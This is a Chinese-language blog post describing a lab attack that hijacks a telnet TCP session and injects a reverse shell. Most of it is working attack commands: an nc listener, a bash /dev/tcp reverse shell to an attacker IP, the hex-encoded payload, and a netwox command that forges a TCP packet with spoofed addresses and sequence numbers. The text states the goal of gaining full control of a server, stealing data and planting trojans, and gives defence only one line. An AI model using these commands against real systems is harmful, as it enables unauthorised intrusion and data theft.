TCP劫持下的反弹Shell注入攻击

反弹Shell的注入

 

思路:

通过劫持Server与数据Server的TCP报文,并伪造成Server,向其注入反弹Shell,使攻击者获得对数据Server的完全控制,窃取数据

 

全局模式下测试:

攻击者Kali监听这个10000端口

$ nc -lp 10000 -vvv

 

数据Server跟Kali进行TCP会话的建立

# bash -i>&/dev/tcp/192.168.211.130/10000 0>&1

 

此时攻击者就连接上了数据Server,而且是root权限,接下来就可以注入木马,窃取数据

劫持下的反弹Shell注入

 

步骤:

1.首先获取Server与数据Server的TCP会话

Server telnet 数据Server

 

2.将注入的代码段转换成16进制格式

攻击代码

bash -i>&/dev/tcp/192.168.211.130/10000 0>&1

16进制 并在其后加入0d00

62617368202d693e262f6465762f7463702f3139322e3136382e3231312e3133302f313030303020303e26310d00
sudo netwox 40 --ip4-ttl  64 --ip4-protocol  6 --ip4-src 192.168.211.134 --ip4-dst 192.168.211.133   --tcp-src  48271 --tcp-dst 23  --tcp-seqnum 1853475182 --tcp-acknum 1216288044  --tcp-ack  --tcp-psh --tcp-window 227 --tcp-data  62617368202d693e262f6465762f7463702f3139322e3136382e3231312e3133302f313030303020303e26310d00

实施攻击:

 

终端栏的第四个窗口是Kali正在进行监听的TCP端口号为10000的会话

查看:可见Kali已经攻击成功,并且进入到了数据Server,这里之所以是redhat用户,是因为Server telnet的是数据Server上的redhat用户

详细分析:

观察打击后的两个telnet包,可见是Server发送给数据Server一个数据为 攻击者Kali注入的代码,但是此时,其实是攻击者冒充了Server,对于数据Server来说,他并不知道,因为攻击者Kali将源目IP、源目端口、ACK、SEQ都伪造了,数据Server是无法判断的,数据Server还会给他一个回应,这一旦回应,攻击者Kali直接登录到数据Server上

 

这时,Server就断开了与数据Server的telnet连接,一直等不到回应是因为此时的telnet来连接时攻击者Kali与数据Server建立的,这样一直虚假重传,过会就会断开连接

而此时,Kali可以随意的窃取并留下一些木马病毒

防御:

       使用SSL加密tcp ,ipsec加密IP,二层加密

 


 

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值